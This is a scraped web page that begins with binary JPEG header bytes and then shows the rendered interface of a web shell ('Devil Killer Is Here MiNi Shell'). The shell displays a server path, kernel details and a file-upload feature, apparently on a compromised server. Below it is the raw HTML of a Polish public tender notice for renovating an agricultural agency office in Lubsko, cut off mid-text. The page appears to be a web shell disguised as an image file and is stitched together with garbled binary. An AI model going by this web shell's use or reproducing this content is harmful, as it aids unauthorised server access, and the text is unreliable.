JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210706/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210706/0010494701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00104947 z dnia 2021-07-06</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie remontu w Lubsku III </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KRAJOWY OŚRODEK WSPARCIA ROLNICTWA</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Oddział Terenowy w Gorzowie Wielkopolskim</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 367849538</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Myśliborska 32</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gorzów Wielkopolski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL431 - Gorzowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne.gorzow@kowr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.kowr.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Wdrażanie i stosowanie instrumentów wsparcia rolnictwa, aktywnej polityki rolnej oraz rozwoju obszarów wiejskich </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie remontu w Lubsku III </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-24f0477d-dd79-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00104947</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00010483/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.11 Remont budynku biurowego SZGZ w Lubsku, ul. 3-go Maja 3, 68-300 Lubsko</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kowr.eb2b.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu<br/>oudzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów<br/>luboświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w<br/>ustawiePzp, odbywa się przy użyciu środków komunikacji elektronicznej wyłącznie za<br/>pośrednictwemPlatformy zakupowej – pod adresem: https://kowr.eb2b.com.pl/ i pod numerem<br/>postępowaniawskazanym w nagłówku strony tytułowej niniejszej SWZ. Przez środki<br/>komunikacjielektronicznejrozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia<br/>18 lipca2002 r. o świadczeniu usług drogą elektroniczną. Korzystanie z Platformy zakupowej jest<br/>nieodpłatne.Korzystanie z Platformy zakupowej wymaga zarejestrowania konta na Platformie<br/>zakupowej. Opissposobu rejestracji oraz czynności technicznych koniecznych do złożenia oferty lub<br/>innychdokumentów znajduje się w rozdziale 16 SWZ przedmiotowego postępowania -<br/>https://kowr.eb2b.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 roku<br/>wsprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych<br/>dladokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzieleniezamówienia publicznego lub konkursie odnosi się do rozporządzenia Rady Ministrów z dnia<br/>12kwietnia2012 roku w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla<br/>rejestrówpublicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla<br/>systemówteleinformatycznych, które zawiera katalog (załącznik nr 2) dopuszczalnych formatów<br/>przesyłanychdanych: pliki o wielkości do 50 MB w formatach: .doc, .docx, .pdf, .zip, .rar., pades, xades,<br/>.xls, xlsx.Wymagania techniczne i organizacyjne korzystania z Platformy zakupowej określa<br/>RegulaminPlatformy zakupowej (dostępny pod adresem https://platforma.eb2b.com.pl/user/terms).<br/>Zamawiający,zgodnie z § 11 rozporządzenia w sprawie użycia środków komunikacji<br/>elektronicznej,określa następujące niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę<br/>na Platformiezakupowej: a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 2 mb/s;b) komputer klasy PC lub PC lub MAC, o następującej konfiguracji: pamięć min.<br/>4GB Ram, procesorIntel IV 4GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4,<br/>Linux lub ichnowszewersje; c) zainstalowana dowolna najnowsza wersja przeglądarki internetowej, w<br/>przypadkuInternet Explorer minimalnie wersja 11.0; d) włączona obsługa JavaScript; e) zainstalowany<br/>programAcrobat Reader. Zamawiający, zgodnie z § 11 rozporządzenia w sprawie użycia środków<br/>komunikacjielektronicznej określa informacje na temat kodowania i czasu odbioru danych: a) plik<br/>załączonyprzezWykonawcę na Platformie i zapisany, widoczny jest w systemie jako zaszyfrowany.<br/>Możliwośćotworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie<br/>terminuskładania ofert; b) oznaczenie czasu odbioru danych przez Platformę zakupową stanowi<br/>przypiętą dodokumentu elektronicznego datę oraz dokładny czas (hh:mm:ss), znajdującą się po prawej<br/>stroniedokumentu w kolumnie „Data przesłania”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja o przetwarzaniu danych osobowych zgodnie zart.<br/>13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia27 kwietnia2016 r.<br/>w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i wsprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólnerozporządzenie o<br/>ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1) znajduje się w rozdziale 28 SWZ<br/>przedmiotowego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GOR.WOP.260.24.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty polegające na remoncie budynku w Lubsku ul. 3-go Maja<br/>3 zgodnie z przedmiarem prac i specyfikacja wykonania i odbioru robót budowlanych. W<br/>szczególności Wykonawca jest zobowiązany do:1) rozebrania obicia ścian i sufitów na<br/>korytarzach, wykonania nowych z płyt gipsowo-kartonowych, szpachlowania i malowania;2)<br/>wymiany posadzek na korytarzu na I piętrze na płytki gresowe;3) naprawy schodów przed<br/>wejściem.4) wymiany na stal nierdzewną balustrad schodowych.5) w 5 pomieszczeniach<br/>biurowych, sekretariacie, sali przetargowej, pom. ksero, pokoju narad, pom. mapowni:a)<br/>usunięcia elementów drewnianych z sufitów i ścian, wykonanie nowych ścian i sufitów z płyt<br/>gipsowo-kartonowych;b) usunięcia tapet;c) usunięcia niesprawnej klimatyzacji;d) szpachlowania<br/>i malowania na kolor biały;e) wymiany paneli podłogowych na LVT lub płytki gresowe (z wyjątkiem pok. 3, 2, 19 i pom mapowni) – decyzja zostanie podjęta przez zamawiającego po<br/>rozebraniu starej nawierzchni i ocenie podłoża;6) naprawy drzwi na korytarzu;7) odświeżenia<br/>toalet damskiej i męskiej, usunięcia pęknięć i malowania ścian, wymiany montażu białego wraz z<br/>armaturą; 8) wymiany opraw w wc na parterze;9) demontażu szafy wnękowej na I piętrze;10)<br/>montażu klimatyzatorów w pomieszczeniach biurowych 5 szt.;11) naprawy komina;12) naprawy<br/>rur spustowych; 13) montażu samozamykaczy w wc;14) montażu drabiny na dach; 15) montażu<br/>drzwiczek rewizyjnych w kotłowni; 16) wymianie węży hydrantowych na węże półsztywne DN<br/>25; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający uzna za najkorzystniejszą ofertę<br/>nieodrzuconą,złożoną przez Wykonawcę niepodlegającego wykluczeniu, która uzyskała największą<br/>łączna ilość punktów wdanym zadaniu obliczoną jako sumę punktów uzyskanych w kryteriach: „CENA”<br/>– waga 60%, „GWARANCJA” – waga 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> spełniają warunki udziału w postępowaniu dotyczące:a) zdolności do występowania w obrocie<br/>gospodarczym:Zamawiający nie wyznacza szczegółowego warunku w tym zakresie,b)<br/>uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to<br/>z odrębnych przepisów :Zamawiający nie wyznacza szczegółowego warunku w tym zakresie,c)<br/>sytuacji ekonomicznej lub finansowej:Wykonawca spełni warunek, jeżeli wykaże, że posiada<br/>ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/>przedmiotem zamówienia na sumę nie niższą niż 100% wartości wynagrodzenia ryczałtowego<br/>brutto, określonego w ofercie Wykonawcy.d) zdolności technicznej lub zawodowej:Opis sposobu<br/>dokonywania oceny spełniania tego warunku: O udzielenie zamówienia mogą ubiegać się<br/>Wykonawcy, którzy:a) w okresie ostatnich 5 lat wykonali:• min. 2 roboty remontowe o<br/>przybliżonym charakterze i wartości tzn. o wartości min. 50 000,00 zł każda, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">• wykazu robót budowlanych, wykonanych nie wcześniej niż w okresie 5 lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania i podmiotów na rzecz których<br/>roboty te były wykonane z załączeniem dowodów określających czy te roboty budowlane zostały<br/>wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z<br/>przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami są referencje bądź inne<br/>dokumenty, wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli<br/>z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych<br/>dokumentów – inne dokumenty.• wykazu osób skierowanych przez wykonawcę do realizacji<br/>zamówienia, wraz z informacjami nt. ich kwalifikacji zawodowych oraz uprawnień niezbędnych do<br/>wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności<br/>do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie<br/>konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub<br/>wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej<br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie<br/>oferty,oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od<br/>innego Wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 4 do SWZ, 2) Odpis<br/>lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem,jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli: 1) może je uzyskać<br/>za<br/>pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w<br/>rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących<br/>zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy<br/>Pzp dane umożliwiające dostęp do tych środków, 2) podmiotowym środkiem dowodowym jest<br/>oświadczenie,którego treść odpowiada zakresowi oświadczenia, o którym mowa w art. 125 ust. 1<br/>ustawy Pzp.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana Umowy o udzielenie niniejszego zamówienia może nastąpić w następujących<br/>przypadkach:1) Zmiana terminu wykonania Umowy: wyłącznie na uzasadniony wniosek<br/>Wykonawcy i Zamawiajacego pod warunkiem, że zmiana ta nie jest zawiniona przez<br/>Wykonawcę, na skutek konieczności wprowadzenia zmian zakresu wykonania przedmiotu<br/>Umowy, na skutek wprowadzenia prac zamiennych, zwłoki w wyznaczaniu i dokonywania<br/>odbiorów przewidzianych Umową, w przypadku wystąpienia konieczności aktualizacji/zmiany<br/>rozwiązań technicznych z uwagi na postęp technologiczny lub zmiany obowiązujących<br/>przepisów, lub czynników miejscowych stwierdzonych w toku wykonywania prac, z powodu<br/>działań osób trzecich uniemożliwiających wykonanie zamówienia pod warunkiem, że działania te<br/>nie są konsekwencją działań którejkolwiek ze Stron Umowy, zmiany będące następstwem<br/>działania organów administracji państwowej, w szczególności odmowa wydania lub<br/>przekroczenie określonych przez prawo terminów wydawania decyzji, zezwoleń, uzgodnień, pod<br/>warunkiem, że zmiany te nie są konsekwencją winy którejkolwiek ze Stron, inne przyczyny<br/>zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością<br/>prowadzenia prac budowlanych,zmiana terminu następuje o czas trwania przeszkody, bądź o<br/>czas zmian wynikający z powyższych okoliczności.2) Zmiana sposobu wykonania przedmiotu<br/>Umowy: zmiana osób, przy pomocy których Wykonawca realizuje przedmiot zamówienia, na<br/>inne, legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w Prawie<br/>Budowlanym. Zamawiający, nie wyraża zgody do zmiany składu Personelu na osoby o niższych<br/>kwalifikacjach,  zmiana Podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot<br/>zamówienia, na innego Podwykonawcę, dysponującego co najmniej porównywalnym<br/>doświadczeniem i Personelem Podwykonawcy; na skutek konieczności wprowadzenia zmian<br/>zakresu wykonania przedmiotu Umowy, wprowadzenia prac zamiennych, aktualizacja/zmiana<br/>rozwiązań technicznych z uwagi na postęp technologiczny lub zmiany obowiązujących<br/>przepisów, lub czynników miejscowych stwierdzonych w toku wykonywania prac,  rozszerzenie<br/>zakresu podwykonawstwa w porównaniu do podanego w Ofercie Wykonawcy; w przypadku<br/>zaistnienia korzyści dla Zamawiającego takich, jak skrócenie terminu wykonania przedmiotu<br/>zamówienia lub zastosowania bardziej zaawansowanych rozwiązań technologicznych.3) Zmiana<br/>wynagrodzenia Wykonawcy: w przypadku ustawowej zmiany podatku VAT Stronom będzie<br/>przysługiwało prawo zmiany wynagrodzenia odpowiednio do ustalonej przez ustawodawcę<br/>zmiany wysokości podatku VAT,  na skutek konieczności wprowadzenia zmian zakresu<br/>wykonania przedmiotu Umowy, w przypadku zaistnienia zmian sposobu wykonania przedmiotu<br/>Umowy,  w przypadku wprowadzenia prac zamiennych, w przypadku wystąpienia konieczności aktualizacji/zmiany rozwiązań technicznych z uwagi na postęp technologiczny lub zmiany<br/>obowiązujących przepisów, lub czynników miejscowych stwierdzonych w toku wykonywania<br/>prac,zmiana wynagrodzenia będzie ustalana po przeprowadzeniu negocjacji Stron z<br/>uwzględnieniem stawek jednostkowych podancyh w ofercie wykonawcy oraz KNR i cen<br/>Sekocenbud za ostatnio ogłoszony kwartał.4) Inne zmiany: w składzie osób reprezentujących<br/>Wykonawcę na uzasadniony wniosek Wykonawcy i pod warunkiem, że zmiana ta wynika z<br/>okoliczności, których Wykonawca nie mógł przewidzieć na etapie składania oferty i nie jest przez<br/>niego zawiniona,  w przypadku zmian organizacyjno-prawnych występujących po stronie<br/>Zamawiającego, w 